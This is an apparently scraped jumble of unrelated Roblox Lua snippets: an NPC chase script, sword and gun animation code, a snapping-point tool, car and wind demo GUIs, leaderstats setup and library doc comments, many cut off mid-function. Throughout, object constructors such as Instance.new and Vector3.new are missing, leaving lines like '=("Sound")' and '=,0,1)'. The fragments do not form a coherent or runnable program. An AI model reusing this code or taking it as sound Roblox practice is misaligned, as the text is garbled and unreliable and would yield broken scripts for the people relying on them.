and(MainTarget.Position-JeffTheKillerHumanoidRootPart.Position).magnitude<99999e99999 then local MusicChoice=1; if MusicChoice==1 and JeffTheKillerScript and JeffTheKiller and JeffTheKiller:FindFirstChild("Chase")then ChosenMusic=JeffTheKiller:FindFirstChild("Chase"); end; if JeffTheKillerScript and JeffTheKiller and ChosenMusic and not ChosenMusic.IsPlaying then ChosenMusic.Volume=0.5; ChosenMusic:Play(); end; elseif JeffTheKillerScript and JeffTheKiller and JeffTheKillerHumanoid and JeffTheKillerHumanoid.Health~=0 and MainTarget and FoundHumanoid and FoundHumanoid.Health~=0 and(MainTarget.Position-JeffTheKillerHumanoidRootPart.Position).magnitude>99999e99999 then if JeffTheKillerScript and JeffTheKiller and ChosenMusic and ChosenMusic.IsPlaying then if not MusicDebounce then Spawn(function() MusicDebounce=true; repeat Wait(0);if JeffTheKillerScript and JeffTheKiller and ChosenMusic then ChosenMusic.Volume=ChosenMusic.Volume-0.01;else break;end;until ChosenMusic.Volume==0 or ChosenMusic.Volume<0; if ChosenMusic then ChosenMusic.Volume=0; ChosenMusic:Stop(); end; ChosenMusic=nil; MusicDebounce=false; end); end; end; end; if not MainTarget and not JeffLaughDebounce then Spawn(function() JeffLaughDebounce=true; repeat Wait(0);if JeffTheKillerScript and JeffTheKiller and JeffTheKillerHead and JeffTheKillerHead:FindFirstChild("Laugh")then JeffTheKillerHead:FindFirstChild("Laugh").Volume=JeffTheKillerHead:FindFirstChild("Laugh").Volume-0.1;else break;end;until JeffTheKillerHead:FindFirstChild("Laugh").Volume==0 or JeffTheKillerHead:FindFirstChild("Laugh").Volume<0; JeffTheKillerHead:FindFirstChild("Laugh").Volume=0; JeffTheKillerHead:FindFirstChild("Laugh"):Stop(); JeffLaughDebounce=false; end); end; if not MainTarget and not MusicDebounce then Spawn(function() MusicDebounce=true; repeat Wait(0);if JeffTheKillerScript and JeffTheKiller and ChosenMusic then ChosenMusic.Volume=ChosenMusic.Volume-0.01;else break;end;until ChosenMusic.Volume==0 or ChosenMusic.Volume<0; if ChosenMusic then ChosenMusic.Volume=0; ChosenMusic:Stop(); end; ChosenMusic=nil; MusicDebounce=false; end); end; if MainTarget then Notice=true; if Notice and not NoticeDebounce and JeffTheKillerScript and JeffTheKiller and JeffTheKillerHead and JeffTheKillerHead:FindFirstChild("Notice")then NoticeDebounce=true; end if JeffTheKillerScript and JeffTheKiller and JeffTheKillerHumanoid and JeffTheKillerHumanoid.Health~=0 then if MainTarget and FoundHumanoid and FoundHumanoid.Health~=0 and(MainTarget.Position-JeffTheKillerHumanoidRootPart.Position).magnitude>5 then JeffTheKillerHumanoid.WalkSpeed=30; elseif MainTarget and FoundHumanoid and FoundHumanoid.Health~=0 and(MainTarget.Position-JeffTheKillerHumanoidRootPart.Position).magnitude<5 then JeffTheKillerHumanoid.WalkSpeed=0.004; end; JeffTheKillerHumanoid:MoveTo(MainTarget.Position+(MainTarget.Position-JeffTheKillerHumanoidRootPart.Position).unit*2,Game:GetService("Workspace"):FindFirstChild("Terrain")); end; else Notice=false; NoticeDebounce=false; local RandomWalk=math.random(1,150); if JeffTheKillerScript and JeffTheKiller and JeffTheKillerHumanoid and JeffTheKillerHumanoid.Health~=0 then JeffTheKillerHumanoid.WalkSpeed=0; if RandomWalk==1 then end; end; end; if JeffTheKillerScript and JeffTheKiller and JeffTheKillerHumanoid then JeffTheKillerHumanoid.DisplayDistanceType="Subject"; JeffTheKillerHumanoid.HealthDisplayDistance=100; JeffTheKillerHumanoid.Name="Humanoid"; JeffTheKillerHumanoid.NameDisplayDistance=100; JeffTheKillerHumanoid.NameOcclusion="OccludeAll"; JeffTheKillerHumanoid.MaxHealth=500; JeffTheKillerHumanoid.JumpPower=50; JeffTheKillerHumanoid.MaxSlopeAngle=89.9; end; if JeffTheKillerScript and JeffTheKiller and JeffTheKillerHumanoid and not JeffTheKillerHumanoid.AutoJumpEnabled then end; if JeffTheKillerScript and JeffTheKiller and JeffTheKillerHumanoid and not JeffTheKillerHumanoid.AutoRotate then end; if JeffTheKillerScript and JeffTheKiller and JeffTheKillerHumanoid and JeffTheKillerHumanoid.PlatformStand then end; if JeffTheKillerScript and JeffTheKiller and JeffTheKillerHumanoid and JeffTheKillerHumanoid.Sit then end; end;
-- Where it says Volume 0 is where you change the volume --And where it says SoundID put the audio ID there --Make sure to change the sound ID and volume too
-- TableUtil -- Stephen Leitnick -- September 13, 2017
-- functions
function stopAllAnimations() local oldAnim = currentAnim currentAnim = "" currentAnimInstance = nil if (currentAnimKeyframeHandler ~= nil) then currentAnimKeyframeHandler:disconnect() end if (currentAnimTrack ~= nil) then currentAnimTrack:Stop() currentAnimTrack:Destroy() currentAnimTrack = nil end return oldAnim end function setAnimationSpeed(speed) if speed ~= currentAnimSpeed then currentAnimSpeed = speed currentAnimTrack:AdjustSpeed(currentAnimSpeed) end end function keyFrameReachedFunc(frameName) if (frameName == "End") then
-- functions
function stopAllAnimations() local oldAnim = currentAnim
--{{ Update Points }}--
game:GetService("RunService").Stepped:Connect(function() change.Text = playerStats.Value end)
-- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --
local damagetime local damagedb = false for _, zambieparts in pairs(zombie:GetChildren())do if zambieparts:IsA'Part' and human.Health > 0 then zambieparts.Touched:connect(function(p) if p.Parent.Name == chaseName and p.Parent.Name ~= zombie.Name and not damagedb then -- damage damagedb = true damagetime = time() local enemy = p.Parent local enemyhuman = getHumanoid(enemy) vars.Attacking.Value = true enemyhuman:TakeDamage(ZombieDamage) vars.Attacking.Value = false while wait() do if damagetime ~= nil and time() >= (damagetime + DamageWait) then damagedb = false damagetime = nil end end end end) end end
-------- OMG HAX
r = game:service("RunService") local damage = 10 local slash_damage = 15 sword = script.Parent.Handle Tool = script.Parent local SlashSound ="Sound") SlashSound.SoundId = "rbxasset://sounds\\swordslash.wav" SlashSound.Parent = sword SlashSound.Volume = 1 local UnsheathSound ="Sound") UnsheathSound.SoundId = "" UnsheathSound.Parent = sword UnsheathSound.Volume = 1 function blow(hit) local humanoid = hit.Parent:findFirstChild("Humanoid") local vCharacter = Tool.Parent local vPlayer = game.Players:playerFromCharacter(vCharacter) local hum = vCharacter:findFirstChild("Humanoid") -- non-nil if tool held by a character if humanoid~=nil and humanoid ~= hum and hum ~= nil then -- final check, make sure sword is in-hand local right_arm = vCharacter:FindFirstChild("Right Arm") if (right_arm ~= nil) then local joint = right_arm:FindFirstChild("RightGrip") if (joint ~= nil and (joint.Part0 == sword or joint.Part1 == sword)) then tagHumanoid(humanoid, vPlayer) humanoid:TakeDamage(damage) wait(1) untagHumanoid(humanoid) end end end end function tagHumanoid(humanoid, player) local creator_tag ="ObjectValue") creator_tag.Value = player creator_tag.Name = "creator" creator_tag.Parent = humanoid end function untagHumanoid(humanoid) if humanoid ~= nil then local tag = humanoid:findFirstChild("creator") if tag ~= nil then tag.Parent = nil end end end function attack() damage = slash_damage SlashSound:play() local anim ="StringValue") anim.Name = "toolanim" anim.Value = "Slash" anim.Parent = Tool end function swordUp() Tool.GripForward =,0,0) Tool.GripRight =,1,0) Tool.GripUp =,0,1) end function swordOut() Tool.GripForward =,0,1) Tool.GripRight =,-1,0) Tool.GripUp =,0,0) end Tool.Enabled = true function onActivated() if not Tool.Enabled then return end Tool.Enabled = false local character = Tool.Parent; local humanoid = character.Humanoid if humanoid == nil then print("Humanoid not found") return end attack() wait(1) Tool.Enabled = true end function onEquipped() UnsheathSound:play() end script.Parent.Activated:connect(onActivated) script.Parent.Equipped:connect(onEquipped) connection = sword.Touched:connect(blow)
--Determine Wheel Size
local wDia = 0 for i,v in pairs(Drive) do if v.Size.x>wDia then wDia = v.Size.x end end
local function Touch(part) local parent = script.Parent local drop = script.Parent.Parent local h = part.Parent:FindFirstChild("Humanoid") if h~= nil then script.Disabled = true parent.rumble:Play() drop.P.Transparency = 1 drop.p1.Transparency = 0 wait(0.1) drop.p1.Transparency = 1 drop.p2.Transparency = 0 wait(0.1) drop.p1.Transparency = 0 drop.p2.Transparency = 1 wait(0.1) drop.p1.Transparency = 1 drop.p2.Transparency = 0 wait(0.1) drop.p1.Transparency = 0 drop.p2.Transparency = 1 wait(0.1) drop.p1.Transparency = 1 drop.p2.Transparency = 0 wait(0.1) drop.p1.Transparency = 1 drop.p2.Transparency = 0 wait(0.1) drop.p1.Transparency = 0 drop.p2.Transparency = 1 wait(0.1) drop.p1.Transparency = 1 drop.p2.Transparency = 0 wait(0.1) drop.p1.Transparency = 0 drop.p2.Transparency = 1 wait(0.1) drop.p1.Transparency = 1 drop.p2.Transparency = 0 wait(0.1) drop.p1.Transparency = 0 drop.p2.Transparency = 1 wait(0.1) drop.p1.Transparency = 1 drop.p2.Transparency = 0 wait(0.1) drop.p1.Transparency = 0 drop.p2.Transparency = 1 wait(0.1) drop.p1.Transparency = 1 drop.p2.Transparency = 0 wait(0.1) parent.bang:Play() drop.p1.Transparency = 1 drop.p2.Transparency = 1 drop.P.Transparency = 1 drop.P.CanCollide = false wait(3) drop.P.CanCollide = true drop.P.Transparency = 0 wait(0.2) script.Disabled = false else print("Humanoid not detected") end end script.Parent.Touched:connect(Touch)
elseif setupmode == "Auto" then mouse.KeyDown:connect(function(key) if key == camkey and enabled == false then enabled = true print("enabled") local descendants = car:GetDescendants() for index, descendant in pairs(descendants) do if descendant:IsA("Sound") then local effect = script.soundeffect:Clone() effect.Name = "soundeffectCop" effect.Parent = descendant for _,exc in pairs(exceptions) do if descendant.Name == exc then descendant.soundeffectCop:Destroy() end end end end elseif key == camkey and enabled == true then enabled = false print("disabled") local descendants = car:GetDescendants() for index, descendant in pairs(descendants) do if descendant:IsA("EqualizerSoundEffect") and descendant.Name == "soundeffectCop" then descendant:Destroy() car.DriveSeat.ChildRemoved:Connect(function(child) if child.Name == "SeatWeld" then local descendants = car:GetDescendants() for index, descendant in pairs(descendants) do if descendant:IsA("EqualizerSoundEffect") and descendant.Name == "soundeffect" then descendant:Destroy() end end end end) end end end end) end
--[[ Centralized place to handle logging. Lets us: - Unit test log output via `Logging.capture` - Disable verbose log messages when not debugging Roact This should be broken out into a separate library with the addition of scoping and logging configuration. ]]
--- Generates a new Maid object -- @return Maid
function return setmetatable({_Tasks = {}}, Maid) end
-- Libraries
Core = require(script.Parent); Support = Core.Support; SnapTracking = {}; SnapTracking.Enabled = false; SnapTracking.TrackCorners = true; SnapTracking.TrackFaceCentroids = true; SnapTracking.TrackEdgeMidpoints = true; function SnapTracking.StartTracking(Callback) -- Starts displaying the given target's snap point nearest to the mouse, calls back every time a new point is approached -- Make sure tracking isn't already on if SnapTracking.Enabled then SnapTracking.StopTracking(); end; -- Indicate that tracking is now enabled SnapTracking.Enabled = true; -- Disable selection Core.Targeting.CancelSelecting(); -- Start the UI SnapTracking.StartUI(); -- Store callback to send changes in current snapping point SnapTracking.SetCallback(Callback); -- Start tracking mouse movement function UpdateTrackingTarget(Input) -- Blacklist the player's character and the items in `TargetBlacklist` local TargetBlacklist = Support.ConcatTable( { Player and Player.Character }, SnapTracking.TargetBlacklist or {} ); -- Find the current target part and point local TargetRay = Workspace.CurrentCamera:ScreenPointToRay(Input.Position.X, Input.Position.Y); local TargetPart, TargetPoint, TargetNormal, TargetMaterial = Workspace:FindPartOnRayWithIgnoreList(, TargetRay.Direction * 5000), TargetBlacklist ); -- Make sure a target part exists if not TargetPart then return; end; -- Check with any snapping target filter if SnapTracking.TargetFilter and not SnapTracking.TargetFilter(TargetPart) then return; end; -- Set the current target for snap point tracking SnapTracking.MousePoint = TargetPoint; SnapTracking.SetTrackingTarget(TargetPart); end; -- Update the tracking and UI to the current mouse and proximity state if not SnapTracking.CustomMouseTracking then SnapTracking.MouseTracking = Support.AddUserInputListener('Changed', 'MouseMovement', false, UpdateTrackingTarget); UpdateTrackingTarget({ Position =, Core.Mouse.Y) }); SnapTracking.Update(); end; end; function SnapTracking.SetCallback(Callback) -- Sets the function that is called back whenever a new snap point is in focus SnapTracking.Callback = Callback; end; function SnapTracking.StartUI() -- Creates the point marking UI SnapTracking.PointMarker = Core.Tool.Interfaces.PointMarker:Clone(); SnapTracking.PointMarker.Parent = Core.UI; end; function SnapTracking.ClearUI() -- Removes the point marking UI -- Make sure tracking is currently enabled if not SnapTracking.Enabled then return; end; -- Remove the point marker UI SnapTracking.PointMarker:Destroy(); SnapTracking.PointMarker = nil; end; function SnapTracking.Update() -- Updates the current closest point, reflects it on UI, calls callback function -- Make sure tracking is currently enabled if not SnapTracking.Enabled then return; end; -- Calculate the closest point local ClosestPoint = SnapTracking.GetClosestPoint(); -- Inform the callback function SnapTracking.Callback(ClosestPoint); -- Update the point marker UI SnapTracking.UpdateUI(ClosestPoint); end; function SnapTracking.UpdateUI(Point) -- Updates the point marker UI to reflect the position of the current closest snap point -- Make sure tracking is enabled, and that the UI has started if not SnapTracking.Enabled or not SnapTracking.PointMarker then return; end; -- Make sure there's actually a point that needs to be marked, or hide the point marker if not Point then SnapTracking.PointMarker.Visible = false; return; end; -- Map the point's position on the screen local PointPosition, PointVisible = Workspace.CurrentCamera:WorldToScreenPoint(Point.p); -- Move the point marker UI to the point's position on the screen SnapTracking.PointMarker.Visible = PointVisible; SnapTracking.PointMarker.Position =, PointPosition.X, 0, PointPosition.Y); end; function SnapTracking.SetTrackingTarget(NewTarget) -- Sets the target part whose snapping points' proximity we are tracking SnapTracking.Target = NewTarget; SnapTracking.Update(); end; function SnapTracking.GetClosestPoint() -- Find the current nearest snapping point for the target, update the GUI -- Make sure there's a target part to track, and a current mouse position to calculate proximity relative to if not SnapTracking.Target or not SnapTracking.MousePoint then return nil; end; local SnappingPoints = {}; local SnappingPointProximity = {}; -- Get the current target's snapping points local PartCFrame = SnapTracking.Target.CFrame; local PartSize = SnapTracking.Target.Size / 2; local SizeX, SizeY, SizeZ = PartSize.X, PartSize.Y, PartSize.Z; -- Filter based on snapping point options if SnapTracking.TrackCorners then table.insert(SnappingPoints, PartCFrame *, SizeY, SizeZ)); table.insert(SnappingPoints, PartCFrame *, SizeY, SizeZ)); table.insert(SnappingPoints, PartCFrame *, -SizeY, SizeZ)); table.insert(SnappingPoints, PartCFrame *, SizeY, -SizeZ)); table.insert(SnappingPoints, PartCFrame *, SizeY, -SizeZ)); table.insert(SnappingPoints, PartCFrame *, -SizeY, SizeZ)); table.insert(SnappingPoints, PartCFrame *, -SizeY, -SizeZ)); table.insert(SnappingPoints, PartCFrame *, -SizeY, -SizeZ)); end; if SnapTracking.TrackEdgeMidpoints then table.insert(SnappingPoints, PartCFrame *, SizeY, 0)); table.insert(SnappingPoints, PartCFrame *, 0, SizeZ)); table.insert(SnappingPoints, PartCFrame *, SizeY, SizeZ)); table.insert(SnappingPoints, PartCFrame *, SizeY, 0)); table.insert(SnappingPoints, PartCFrame *, 0, SizeZ)); table.insert(SnappingPoints, PartCFrame *, -SizeY, SizeZ)); table.insert(SnappingPoints, PartCFrame *, -SizeY, 0)); table.insert(SnappingPoints, PartCFrame *, 0, -SizeZ)); table.insert(SnappingPoints, PartCFrame *, SizeY, -SizeZ)); table.insert(SnappingPoints, PartCFrame *, -SizeY, 0)); table.insert(SnappingPoints, PartCFrame *, 0, -SizeZ)); table.insert(SnappingPoints, PartCFrame *, -SizeY, -SizeZ)); end; if SnapTracking.TrackFaceCentroids then table.insert(SnappingPoints, PartCFrame *, 0, 0)); table.insert(SnappingPoints, PartCFrame *, 0, SizeZ)); table.insert(SnappingPoints, PartCFrame *, SizeY, 0)); table.insert(SnappingPoints, PartCFrame *, 0, 0)); table.insert(SnappingPoints, PartCFrame *, -SizeY, 0)); table.insert(SnappingPoints, PartCFrame *, 0, -SizeZ)); end; -- Calculate proximity of each snapping point to the mouse for SnappingPointKey, SnappingPoint in ipairs(SnappingPoints) do SnappingPointProximity[SnappingPointKey] = (SnapTracking.MousePoint - SnappingPoint.p).magnitude; end; -- Sort out the closest snapping point local ClosestPointKey = 1; for PointKey, Proximity in pairs(SnappingPointProximity) do if Proximity < SnappingPointProximity[ClosestPointKey] then ClosestPointKey = PointKey; end; end; -- Return the closest point return SnappingPoints[ClosestPointKey]; end; function SnapTracking.StopTracking() -- Stops tracking the current closest snapping point, cleans up -- Clear the previous tracking target, and callback SnapTracking.Target = nil; SnapTracking.Callback = nil; -- Reset snapping point options SnapTracking.TrackFaceCentroids = true; SnapTracking.TrackEdgeMidpoints = true; SnapTracking.TrackCorners = true; SnapTracking.TargetFilter = nil; SnapTracking.TargetBlacklist = {}; -- Make sure we're currently tracking if not SnapTracking.Enabled then return; end; -- Stop tracking the mouse and its proximity to snapping points SnapTracking.MouseTracking:Disconnect(); SnapTracking.MouseTracking = nil; -- Clear the point marker UI from the screen SnapTracking.ClearUI(); -- Indicate that tracking is no longer enabled SnapTracking.Enabled = false; end; return SnapTracking;
-- This library contains a collection of clever hacks. -- If you ever find a mistake in this library or a way to make a -- function more efficient or less hacky, please notify JulienDethurens of it.
--// Animations
-- Idle Anim IdleAnim = function(char, speed, objs) --TweenJoint(objs[1], nil ,, function(X) return math.sin(math.rad(X)) end, 0.25) TweenJoint(objs[2], nil ,, 0.295501232, -1.07592201, 1, 0, 0, 0, 1.19248806e-08, 1, 0, -1, 1.19248806e-08), function(X) return math.sin(math.rad(X)) end, 0.25) TweenJoint(objs[3], nil ,, -0.0621779114, -1.67288721, 0.787567914, -0.220087856, 0.575584888, -0.615963876, -0.308488727, 0.724860668, 0.0180283934, -0.925416589, -0.378522098), function(X) return math.sin(math.rad(X)) end, 0.25) wait(0.18) end; -- FireMode Anim FireModeAnim = function(char, speed, objs) TweenJoint(objs[1], nil ,, 0, -0.0787199363, 0.962304771, 0.271973342, 0, -0.261981696, 0.926952124, -0.268561482, -0.0730415657, 0.258437991, 0.963262498), function(X) return math.sin(math.rad(X)) end, 0.25) wait(0.1) TweenJoint(objs[2], nil ,, -0.310947895, -1.34432662, 0.766044378, -2.80971371e-008, 0.642787576, -0.620885074, -0.258818865, 0.739942133, 0.166365519, -0.965925872, -0.198266774), function(X) return math.sin(math.rad(X)) end, 0.25) wait(0.17) objs[4]:WaitForChild("Click"):Play() end; --[[{["Base"], RAW, LAW, Mag, FLA, VMC, BoltW}]]-- -- Reload Anim ReloadAnim = function(char, speed, objs) TweenJoint(objs[2], nil ,, 0.295501232, -1.07592201, 0.973990917, -0.226587087, 2.70202394e-09, -0.0646390691, -0.277852833, 0.958446443, -0.217171595, -0.933518112, -0.285272509), function(X) return math.sin(math.rad(X)) end, 0.5) TweenJoint(objs[3], nil ,, -0.0621779114, -1.63076854, 0.787567914, -0.220087856, 0.575584888, -0.615963876, -0.308488727, 0.724860668, 0.0180283934, -0.925416589, -0.378522098), function(X) return math.sin(math.rad(X)) end, 0.5) wait(0.5) local MagC = Tool:WaitForChild("Mag"):clone() MagC:FindFirstChild("Mag"):Destroy() MagC.Parent = Tool MagC.Name = "MagC" local MagCW ="Motor6D") MagCW.Part0 = MagC MagCW.Part1 = workspace.CurrentCamera:WaitForChild("Arms"):WaitForChild("Left Arm") MagCW.Parent = MagC MagCW.C1 = MagC.CFrame:toObjectSpace(objs[4].CFrame) objs[4].Transparency = 1 objs[6]:WaitForChild("MagOut"):Play() TweenJoint(objs[3], nil ,, -0.0621778965, -2.69811869, 0.787567914, -0.220087856, 0.575584888, -0.51537323, 0.276813388, 0.811026871, -0.337826759, -0.935379863, 0.104581922), function(X) return math.sin(math.rad(X)) end, 0.3) TweenJoint(objs[2], nil ,, 0.295501232, -1.29060709, 0.973990917, -0.226587087, 2.70202394e-09, -0.0646390691, -0.277852833, 0.958446443, -0.217171595, -0.933518112, -0.285272509), function(X) return math.sin(math.rad(X)) end, 0.1) wait(0.1) TweenJoint(objs[2], nil ,, 0.295501232, -1.07592201, 0.973990917, -0.226587087, 2.70202394e-09, -0.0646390691, -0.277852833, 0.958446443, -0.217171595, -0.933518112, -0.285272509), function(X) return math.sin(math.rad(X)) end, 0.3) wait(0.3) objs[6]:WaitForChild('MagIn'):Play() TweenJoint(objs[3], nil ,, -0.0621779114, -1.63076854, 0.787567914, -0.220087856, 0.575584888, -0.615963876, -0.308488727, 0.724860668, 0.0180283934, -0.925416589, -0.378522098), function(X) return math.sin(math.rad(X)) end, 0.3) wait(0.4) MagC:Destroy() objs[4].Transparency = 0 end; -- Bolt Anim BoltBackAnim = function(char, speed, objs) TweenJoint(objs[3], nil ,, 0.518400908, -1.07592201, 0.984651804, 0.174530268, -2.0812525e-09, 0.0221636202, -0.125041038, 0.991903961, 0.173117265, -0.97668004, -0.12699011), function(X) return math.sin(math.rad(X)) end, 0.25) wait(0.1) TweenJoint(objs[2], nil ,, -0.492658436, -1.55705214, 0.140073985, -0.978677034, -0.150234282, -0.955578506, -0.173358306, 0.238361627, -0.259323537, 0.110172354, -0.959486008), function(X) return math.sin(math.rad(X)) end, 0.25) wait(0.4) objs[5]:WaitForChild("BoltBack"):Play() TweenJoint(objs[2], nil ,, -0.609481037, -1.02827215, 0.140073985, -0.978677034, -0.150234282, -0.955578506, -0.173358306, 0.238361627, -0.259323537, 0.110172354, -0.959486008), function(X) return math.sin(math.rad(X)) end, 0.25) TweenJoint(objs[1], nil ,, 0, 0.230707675, 1, 0, 0, 0, 1, 0, 0, 0, 1), function(X) return math.sin(math.rad(X)) end, 0.25) TweenJoint(objs[3], nil ,, 0.175939053, -1.07592201, 0.984651804, 0.174530268, -2.0812525e-09, 0.0221636202, -0.125041038, 0.991903961, 0.173117265, -0.97668004, -0.12699011), function(X) return math.sin(math.rad(X)) end, 0.25) wait(0.3) end; -- gunSettings.BoltForwardAnim(char, speed, {BoltW, LAW, RAW, AnimBaseW, Bolt}); BoltForwardAnim = function(char, speed, objs) objs[5]:WaitForChild("BoltForward"):Play() TweenJoint(objs[1], nil ,, function(X) return math.sin(math.rad(X)) end, 0.1) TweenJoint(objs[2], nil ,, -0.900531948, -0.749261618, 0.140073985, -0.978677034, -0.150234282, -0.955578506, -0.173358306, 0.238361627, -0.259323537, 0.110172354, -0.959486008), function(X) return math.sin(math.rad(X)) end, 0.1) TweenJoint(objs[3], nil ,, 0.617181182, -1.07592201, 0.984651804, 0.174530268, -2.0812525e-09, 0.0221636202, -0.125041038, 0.991903961, 0.173117265, -0.97668004, -0.12699011), function(X) return math.sin(math.rad(X)) end, 0.2) wait(0.2) --TweenJoint(objs[3], nil ,, 0.0776977539, -1.62080014, 0.99999994, 0, 0, 0, -4.37113883e-08, 1, 0, -1, -4.37113883e-08), function(X) return math.sin(math.rad(X)) end, 0.2) --wait(0.3) end; -- Bolting Back BoltingBackAnim = function(char, speed, objs) TweenJoint(objs[1], nil ,, 0, 0.230707675, 1, 0, 0, 0, 1, 0, 0, 0, 1), function(X) return math.sin(math.rad(X)) end, 0.1) end; BoltingForwardAnim = function(char, speed, objs) TweenJoint(objs[1], nil ,, function(X) return math.sin(math.rad(X)) end, 0.1) end; } return Settings
--[[ Public API ]]
-- function ShiftLockController:IsShiftLocked() return IsShiftLockMode and IsShiftLocked end function ShiftLockController:SetIsInFirstPerson(isInFirstPerson) IsInFirstPerson = isInFirstPerson end
--[[ Settings Changed Connections ]]
-- LocalPlayer.Changed:connect(function(property) if IsTouchDevice and property == 'DevTouchMovementMode' then DevMovementMode = LocalPlayer.DevTouchMovementMode IsUserChoice = DevMovementMode == Enum.DevTouchMovementMode.UserChoice if IsUserChoice then UserMovementMode = GameSettings.TouchMovementMode end onControlsChanged() elseif not IsTouchDevice and property == 'DevComputerMovementMode' then DevMovementMode = LocalPlayer.DevComputerMovementMode IsUserChoice = DevMovementMode == Enum.DevComputerMovementMode.UserChoice if IsUserChoice then UserMovementMode = GameSettings.ComputerMovementMode end onControlsChanged() end end) GameSettings.Changed:connect(function(property) if not IsUserChoice then return end if property == 'TouchMovementMode' or property == 'ComputerMovementMode' then UserMovementMode = GameSettings[property] onControlsChanged() end end)
--This script creates a leaderstat and saves it with the DataStoreService. --Put this inside of the ServerScriptService.
local stat = "Points" --Change to your stat name local startamount = 0 --Change to how much points the player will start out with local DataStore = game:GetService("DataStoreService") local ds = DataStore:GetDataStore("LeaderStatSave")
-- Demo dynamic settings
local Gui ="ScreenGui") local CountLabel ="TextLabel") CountLabel.Text = string.format("Leaf Count: %d Active, %d Inactive, 77760 Total",0,0) CountLabel.BackgroundTransparency = 0.3 CountLabel.BackgroundColor3 = CountLabel.TextStrokeTransparency = 0.8 CountLabel.Size =,0,0,27) CountLabel.Position =,0,1,-35) CountLabel.Font = Enum.Font.RobotoMono CountLabel.TextSize = 25 CountLabel.TextColor3 =,1,1) CountLabel.Parent = Gui local SpeedInput ="TextBox") SpeedInput.Text = string.format("Wind Speed: %.1f",WIND_SPEED) SpeedInput.PlaceholderText = "Input Speed" SpeedInput.BackgroundTransparency = 0.8 SpeedInput.TextStrokeTransparency = 0.8 SpeedInput.Size =,0,0,20) SpeedInput.Position =,5,0.45,0) SpeedInput.Font = Enum.Font.RobotoMono SpeedInput.TextXAlignment = Enum.TextXAlignment.Left SpeedInput.TextSize = 18 SpeedInput.TextColor3 =,1,1) SpeedInput.FocusLost:Connect(function() local newSpeed = tonumber(SpeedInput.Text:match("[%d%.]+")) if newSpeed then WIND_SPEED = math.clamp(newSpeed,0,50) WindLines.Speed = WIND_SPEED WindShake:UpdateAllObjectSettings({Speed = WIND_SPEED}) WindShake:SetDefaultSettings({Speed = WIND_SPEED}) end SpeedInput.Text = string.format("Wind Speed: %.1f",WIND_SPEED) end) SpeedInput.Parent = Gui local PowerInput ="TextBox") PowerInput.Text = string.format("Wind Power: %.1f",WIND_POWER) PowerInput.PlaceholderText = "Input Power" PowerInput.BackgroundTransparency = 0.8 PowerInput.TextStrokeTransparency = 0.8 PowerInput.Size =,0,0,20) PowerInput.Position =,5,0.45,25) PowerInput.Font = Enum.Font.RobotoMono PowerInput.TextXAlignment = Enum.TextXAlignment.Left PowerInput.TextSize = 18 PowerInput.TextColor3 =,1,1) PowerInput.FocusLost:Connect(function() local newPower = tonumber(PowerInput.Text:match("[%d%.]+")) if newPower then WIND_POWER = math.clamp(newPower,0,3) WindShake:UpdateAllObjectSettings({Power = WIND_POWER}) WindShake:SetDefaultSettings({Power = WIND_POWER}) end PowerInput.Text = string.format("Wind Power: %.1f",WIND_POWER) end) PowerInput.Parent = Gui local DirInput ="TextBox") DirInput.Text = string.format("Wind Direction: %.1f,%.1f,%.1f",WIND_DIRECTION.X,WIND_DIRECTION.Y,WIND_DIRECTION.Z) DirInput.PlaceholderText = "Input Direction" DirInput.BackgroundTransparency = 0.8 DirInput.TextStrokeTransparency = 0.8 DirInput.Size =,0,0,20) DirInput.Position =,5,0.45,50) DirInput.Font = Enum.Font.RobotoMono DirInput.TextXAlignment = Enum.TextXAlignment.Left DirInput.TextSize = 18 DirInput.TextColor3 =,1,1) DirInput.FocusLost:Connect(function() local Inputs = table.create(3) for Num in string.gmatch(DirInput.Text, "%-?[%d%.]+") do Inputs[#Inputs+1] = tonumber(Num) end local newDir = Inputs[1] or WIND_DIRECTION.X, Inputs[2] or WIND_DIRECTION.Y, Inputs[3] or WIND_DIRECTION.Z ).Unit if newDir then WIND_DIRECTION = newDir WindLines.Direction = newDir WindShake:UpdateAllObjectSettings({Direction = newDir}) WindShake:SetDefaultSettings({Direction = newDir}) end DirInput.Text = string.format("Wind Direction: %.1f, %.1f, %.1f",WIND_DIRECTION.X,WIND_DIRECTION.Y,WIND_DIRECTION.Z) end) DirInput.Parent = Gui spawn(function() while wait(0.1) do local Active,Handled = WindShake.Active,WindShake.Handled CountLabel.Text = string.format("Leaf Count: %d Active, %d Inactive, %d Not Streamed In (77760 Total)",Active,Handled-Active,77760-Handled) end end)
--[[Status Vars]]
local _IsOn = _Tune.AutoStart script.Parent.IsOn.Value = _IsOn local _GSteerT=0 local _GSteerC=0 local _GThrot=0 local _GBrake=0 local _ClutchOn = true local _ClPressing = false local _RPM = 0 local _HP = 0 local _OutTorque = 0 local _CGear = 0 local _PGear = _CGear local _spLimit = 0 local _TMode = _Tune.TransmissionType[1] local _MSteer = false local _SteerL = false local _SteerR = false local _PBrake = false local _TCS = _Tune.TCSEnabled local _TCSActive = false local _ABS = _Tune.ABSEnabled local _ABSActive = false local _InControls = false
---SG Is Here--- ---Please Dont Change Anything Can Dont Work If You Change--
-- Just so you know, the lower the value of x, the faster it spins. -- this is useful if you want to change the rotational speed.
--------------------- TEMPLATE ASSAULT RIFLE WEAPON --------------------------- -- Waits for the child of the specified parent
local function WaitForChild(parent, childName) while not parent:FindFirstChild(childName) do parent.ChildAdded:wait() end return parent[childName] end local GLib = require(206209239)
--[=[ @return SIGNAL_MARKER Returns a marker that will transform the current key into a RemoteSignal once the service is created. Should only be called within the Client table of a service. See [RemoteSignal]( documentation for more info. ```lua local MyService = Knit.CreateService { Name = "MyService", Client = { -- Create the signal marker, which will turn into a -- RemoteSignal when Knit.Start() is called: MySignal = Knit.CreateSignal(), }, } function MyService:KnitInit() -- Connect to the signal: self.Client.MySignal:Connect(function(player, ...) end) end ``` ]=]
function KnitServer.CreateSignal() return SIGNAL_MARKER end
--[[** ensures Roblox Vector3int16 type @param value The value to check against @returns True iff the condition is satisfied, false otherwise **--]]
t.Vector3int16 = primitive("Vector3int16")
--CasingMesh.Scale =,.75,.75)
